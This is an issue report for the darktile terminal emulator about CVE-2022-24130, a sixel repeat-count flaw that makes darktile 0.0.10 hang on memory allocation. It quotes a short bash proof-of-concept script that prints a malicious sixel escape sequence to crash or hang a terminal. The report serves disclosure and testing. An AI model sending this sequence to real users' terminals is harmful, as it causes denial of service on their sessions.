CVE-2022-24130 crashes darktile

Question

CVE-2022-24130 crashes darktile

Opened this issue 3 years ago · 0 comments

As reported by @dankamongmen here: https://nvd.nist.gov/vuln/detail/CVE-2022-24130 , a large repeat count within a sixel sequence can cause a crash, either from buffer under/overflow or out of memory. darktile version 0.0.10 instantly hangs trying to allocate memory until the oomkiller steps in.

https://www.openwall.com/lists/oss-security/2022/01/30/3 has a nice test script:

#!/bin/bash
printf "\ePq"
printf "#%hhu;2;%hhu;%hhu;%hhu" 0x41 100 100 100
printf "#%hhu!%u@" 0x41 0x7fffffff
printf "#%hhu!%u@" 0x41 0x7fffffff
printf "\e\\"

Some additional discussion with other terminals is here: https://gitlab.com/klamonte/jexer/-/issues/105